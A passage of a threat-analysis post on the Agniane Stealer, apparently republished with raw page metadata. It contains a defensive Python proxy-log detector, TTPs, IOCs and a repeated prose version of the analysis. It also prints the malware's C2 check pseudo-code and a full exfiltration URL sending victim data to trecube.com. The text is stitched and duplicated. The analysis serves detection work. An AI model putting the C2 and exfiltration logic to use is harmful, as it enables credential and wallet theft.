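2024-02-16T10:00:03Z 10.0.0.5 GET https://trecube.com/getext?id=67
2024-02-16T10:00:04Z 10.0.0.5 GET https://trecube13.ru/getjson?id=67
2024-02-16T10:00:05Z 10.0.0.5 GET https://ip-api.com/json/?fields=11827
2024-02-16T10:00:09Z 10.0.0.5 POST https://trecube.com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0
2024-02-16T10:01:00Z 10.0.0.7 GET https://example.org/getjson?id=1
"""


def classify_url(url):
    """Map a URL to the Agniane C2 stage it resembles, or None."""
    parts = urlsplit(url)
    path = parts.path.rstrip("/") or "/"
    query = parse_qs(parts.query)
    if path == "/test":
        return "availability-check"        # C2 is expected to answer "13"
    if path == "/getext" and "id" in query:
        return "extension-list"            # semicolon-separated globs
    if path == "/getjson" and "id" in query:
        return "sandbox-report"            # debug/emulate/virtualbox flags
    if path == "/gate" and query.get("token", [""])[0].startswith("AGNIANE-"):
        return "exfiltration"              # archive upload with victim metadata
    return None


def scan_proxy_log(log_text):
    """Return one hit per log line that matches a C2 stage.

    Confidence is high when the host is a known C2 domain or the URL carries
    the AGNIANE- token; otherwise the hit is a low-confidence hunting lead.
    """
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, client, _method, url = line.split(maxsplit=3)
        stage = classify_url(url)
        if stage is None:
            continue
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        confidence = "high" if host in KNOWN_C2_DOMAINS or stage == "exfiltration" else "low"
        hit = {"time": timestamp, "client": client, "host": host,
               "stage": stage, "confidence": confidence}
        if stage == "exfiltration":
            # Victim metadata travels in the query string; keep blanks (country=, ip=).
            query = parse_qs(parts.query, keep_blank_values=True)
            hit["token"] = query["token"][0]
            hit["pcname"] = query.get("pcname", [""])[0]
            hit["cookies"] = int(query.get("cookies", ["0"])[0])
        hits.append(hit)
    return hits


def affected_clients(hits):
    """Sorted client addresses with at least one high-confidence hit."""
    return sorted({h["client"] for h in hits if h["confidence"] == "high"})


def parse_extension_list(body):
    """Split a getext response such as '*.txt; *.doc; *seed*' into glob patterns."""
    return [p.strip() for p in body.split(";") if p.strip()]


def files_matching(patterns, filenames):
    """File names the given extension list would sweep up (case-insensitive)."""
    return [f for f in filenames
            if any(fnmatch(f.lower(), p.lower()) for p in patterns)]


if __name__ == "__main__":
    hits = scan_proxy_log(SAMPLE_PROXY_LOG)
    for hit in hits:
        print(hit)
    print("clients to triage:", affected_clients(hits))
    globs = parse_extension_list("*.txt; *.doc; *.docx; *.wallet; *seed*")
    print(files_matching(globs, ["notes.txt", "Seed-backup.docx", "photo.png"]))
```

The ip-api.com lookup is deliberately not flagged: on its own it is too common to be a signal, but it is useful corroboration once a client already has a high-confidence hit. The /test and getjson?id= shapes on an unknown host are reported at low confidence so they can be used as pivots rather than alerts.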

Other TTPs

The Agniane Stealer was also seen performing the following actions:

- Enumerating the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed applications, and collecting this information as well.
- Checking for the public IP via ip-api.com, i.e., https://ip-api.com/json/?fields=11827
- Dumping Bitcoin and other cryptocurrency wallets.
- Performing (weak) checks to see whether it is running in a debugged or virtual environment.
- Collecting wallet.dat files.
- Enumerating profile and user data.
- Collecting stored credit cards.
- Adding other malware, such as NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM/anti-debug techniques. It exhibits behaviour common to stealers, such as collecting and exfiltrating files, credentials, passwords, credit card details, wallets, etc. Its evasive nature and the breadth of information it targets might attract more adversaries to leverage its services in the future.

Kill Chain

Kill Chain            | Activity                                                            | TTP
----------------------|--------------------------------------------------------------------|------------------------------
Weaponization         | Use of PowerShell, ZIP file, batch file                            | T1059.005, T1059.001
Delivery              | ZIP file downloaded by the browser                                 | T1204.002
                      | Use of compromised websites                                        | T1584.004
Exploitation          | Running obfuscated PowerShell payload                              | T1059.001, T1027.010
                      | PowerShell decrypts payload using XOR and decompresses using Gunzip | T1140, T1059.001
                      | Reflective loading of the payload through PowerShell               | T1059.001, T1204.002, T1620
                      | Use of renamed PowerShell                                          | T1036.003
Installation          |                                                                    |
Command and Control   |                                                                    |
Actions on Objectives | Collection of various information from the host                    | T1119
                      | Targeting of credentials                                           | T1555

Indicators of Compromise

Type      | Stage    | IOC (indicators of compromise)
----------|----------|-----------------------------------------------------------------
File Hash | Delivery | 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash | Delivery | e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash | Delivery | b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain    | C2       | trecube[.]com
Domain    | C2       | trecube[.]store
Domain    | C2       | trecube13[.]ru
Domain    | C2       | imitato23[.]store
Domain    | C2       | wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer

This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer: Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion. Command and Control The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is \u201c13.\u201d This time request was made to a URL labeled \u201ctest,\u201d for instance. WebClient wc =\u00a0new\u00a0WebClient(); urlData = wc.DownloadString(\u201chttps:\/\/trecube[.]com\/test\u201d); If urlData ==\u00a0\u201c13\u201d\u00a0 list_of_active_c2.Add(\u201ctrecube[.]com\u201d) continue; In our sample, we can see the following IOCs (indicators of compromise) presented in resources file: trecube[.]com trecube13[.]ru imitato23[.]store wood100home[.]ru For all these domains, the sample is calling for a test URL. urlList = \u201chttps:\/\/trecube.com\/\u201c,\u00a0\u201chttps:\/\/trecube13.ru\/\u201c,\u00a0\u201chttps:\/\/imitato23.store\/\u201c,\u00a0\u201chttps:\/\/wood100home.ru\/\u201c for\u00a0domain in domainList: WebClient wc =\u00a0new\u00a0WebClient(); urlData = wc.DownloadString(domain +\u00a0\u201ctest\u201d); If urlData ==\u00a0\u201c13\u201d\u00a0 list_of_active_c2.Add(domain) continue; Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern\u00a0getext?id=\u00a0followed by an ID \u2013 a part of resources of the _CASH_78 file. 
On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like: *.txt; *.doc; *.docx; *.wallet; *seed* Again, this is handled as previous checking string in the code. It is parsed\/split by semicolon and a list of extensions is created in a list of variables in C# code. The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString. Subsequently, the malware requests a remote json file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like: hxxps:\/\/trecube13[.]ru\/getjson?id=67 And here what its corresponding output looks like: \u201cdebug\u201d:\u00a0\u201c0\u201d, \u201cemulate\u201d:\u00a0\u201c0\u201d, \u201cvirtualbox\u201d:\u00a0\u201c1\u201d, \u201cvirustotal\u201d:\u00a0\u201c0\u201d, \u201cerror\u201d:\u00a0\u201c0\u201d, \u201cerrorname\u201d:\u00a0\u201cNONE\u201d, \u201cerrortext\u201d:\u00a0\u201cNONE\u201d \u201ccompetitor\u201d:\u00a0\u201c0\u201d The next stage involves enumeration and collection. It scans the computer to collect all documents with specified extensions instructed by the URL with a \u201cgetext\u201d pattern, along with other credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is a common activity amongst information stealer malware. Additionally, Agniane was checking to see the localization setting of the victim computer. 
If it contains any of the language packages below, it does not proceed with the infection, ru-RU kk-KZ ro-MD uz-UZ be-BY az-Latn-AZ hy-AM ky-KG tg-Cyrl-TJ The allowlisting of some regions can also mean the developer does not want to attack specific regions. Based on other observations it is possible to expect the attacker is from a country with a strong diplomatic tie to Russia. Once all the target files are collected, the malware creates a ZIP archive under the \u201clocal application data\u201d folder, C:Users[user]AppDataLocal[A-Z0-9]32 Below is the structure\/content of this archive file Agniane Stealer.txt\u00a0\/\/added as attachement here Installe Apps.txt\u00a0\/\/added as attachement here PC Information.txt\u00a0\/\/added as attachement here Files from Desktop\u00a0\/\/FOLDER \u2013 contains exfiltrated files from Desktop folder Files from \u2026\u00a0\/\/FOLDER \u2013 contains exfiltrated files from \u2026 \u2026\u00a0\/\/and other folders, which contain exfiltrated files. It is later uploaded to https:\/\/trecube[.]com\/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0 Below you can find the illustrated version of the Agniane Stealer\u2019s C2 communication, The C2 communication protocol. Other TTPs The Agniane Stealer was also seen performing following actions: Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for installed applications, it also collects this information. Checking for a public IP on a ip-api.com, i.e, https:\/\/ip-api.com\/json\/?fields=11827 Dumping Bitcoin and other cryptocurrency wallets Performing (not well) checks to see if it\u2019s running in a debugged or virtual env. etc. Collecting wallet.dat files. Enumerating Profile and User data. Collecting stored credit cards. 
Adding other malware like NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3). Conclusion The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM\/debug techniques. It exhibits common behavior for stealers such as collecting and exfiltrating files, credentials password, credit card details, wallets, etc. Its evasive nature and targeting of various information might attract more adversaries in future to leverage its services. Kill Chain Kill Chain Activity TTP Weaponization Use of PowerShell, ZIP file, batch file T1059.005 T1059.001 Delivery ZIP file downloaded by the browser T1204.002 Use of compromised websites T1584.004 Exploitation Running Obfuscated PowerShell payload T1059.001 T1027.010 PowerShell decrypts payload using XOR and decompress using Gunzip T1140 T1059.001 Reflective loading of the payload through Powershell T1059.001 T1204.002 T1620 Use of Renamed PowerShell T1036.003 Installation Command and Control Actions on Objectives Collection of various information from the host T1119 Targeting of credentials T1555 Indicators of Compromise Type Stage IOC (indicators of compromise) File Hash Delivery 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df File Hash Delivery e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574 File Hash Delivery b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87 Domain C2 trecube[.]com Domain C2 trecube[.]store Domain C2 trecube13[.]ru Domain C2 imitato23[.]store Domain C2 wood100home[.]ru References [1] https:\/\/twitter.com\/MalGamy12\/status\/1688984207752663040?t=xECvfQF8pujQERAmhfI41w [2] https:\/\/www.zscaler.com\/blogs\/security-research\/agniane-stealer-dark-web-s-crypto-threat [3] https:\/\/blog.pulsedive.com\/analyzing-agniane-stealer\/ [4] https:\/\/www.pcrisk.com\/removal-guides\/27510-agniane-stealer We\u2019d love to hear what you think. 
Ask a Question, Comment Below, and Stay Connected with Cisco Security on social! Cisco Security Social Channels InstagramFacebookTwitterLinkedIn Share Share: \"]]\u00a0\u00a0Agniane Stealer is a malware that targets credentials and documents, actively sold on Telegram, with ConfuserEX obfuscations, presents novel C2 protocol.\u00a0\u00a0Read More\u00a0Cisco Blogs\u00a0","og_url":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/","og_site_name":"JHC","article_published_time":"2024-02-16T18:50:26+00:00","og_image":[{"width":1,"height":1,"url":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/02\/16579832-Y4Kd9v.gif","type":"image\/gif"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#article","isPartOf":{"@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/"},"author":{"name":"","@id":""},"headline":"Agniane Stealer: Information stealer targeting cryptocurrency users Adela Jezkova on February 16, 2024 at 1:00 
pm","datePublished":"2024-02-16T18:50:26+00:00","dateModified":"2024-02-16T18:50:26+00:00","mainEntityOfPage":{"@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/"},"wordCount":2174,"publisher":{"@id":"https:\/\/jacksonholdingcompany.com\/#organization"},"image":{"@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#primaryimage"},"thumbnailUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/02\/16579832-Y4Kd9v.gif","articleSection":["Cisco: Learning"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/","url":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/","name":"Agniane Stealer: Information stealer targeting cryptocurrency users Adela Jezkova on February 16, 2024 at 1:00 pm - 
JHC","isPartOf":{"@id":"https:\/\/jacksonholdingcompany.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#primaryimage"},"image":{"@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#primaryimage"},"thumbnailUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/02\/16579832-Y4Kd9v.gif","datePublished":"2024-02-16T18:50:26+00:00","dateModified":"2024-02-16T18:50:26+00:00","breadcrumb":{"@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#primaryimage","url":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/02\/16579832-Y4Kd9v.gif","contentUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/02\/16579832-Y4Kd9v.gif","width":1,"height":1},{"@type":"BreadcrumbList","@id":"https:\/\/jacksonholdingcompany.com\/agniane-stealer-information-stealer-targeting-cryptocurrency-users-adela-jezkova-on-february-16-2024-at-100-pm\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jacksonholdingcompany.com\/"},{"@type":"ListItem","position":2,"name":"Agniane Stealer: Information stealer targeting cryptocurrency users Adela Jezkova on February 16, 2024 at 1:00 
pm"}]},{"@type":"WebSite","@id":"https:\/\/jacksonholdingcompany.com\/#website","url":"https:\/\/jacksonholdingcompany.com\/","name":"JHC","description":"Your Business Is Our Business","publisher":{"@id":"https:\/\/jacksonholdingcompany.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jacksonholdingcompany.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/jacksonholdingcompany.com\/#organization","name":"JHC","url":"https:\/\/jacksonholdingcompany.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jacksonholdingcompany.com\/#\/schema\/logo\/image\/","url":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2023\/07\/cropped-cropped-jHC-white-500-\u00d7-200-px-1-1.png","contentUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2023\/07\/cropped-cropped-jHC-white-500-\u00d7-200-px-1-1.png","width":452,"height":149,"caption":"JHC"},"image":{"@id":"https:\/\/jacksonholdingcompany.com\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/posts\/2446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/comments?post=2446"}],"version-history":[{"count":0,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/posts\/2446\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/media\/2447"}],"wp:attachment":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/media?parent=2446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/c
ategories?post=2446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/tags?post=2446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}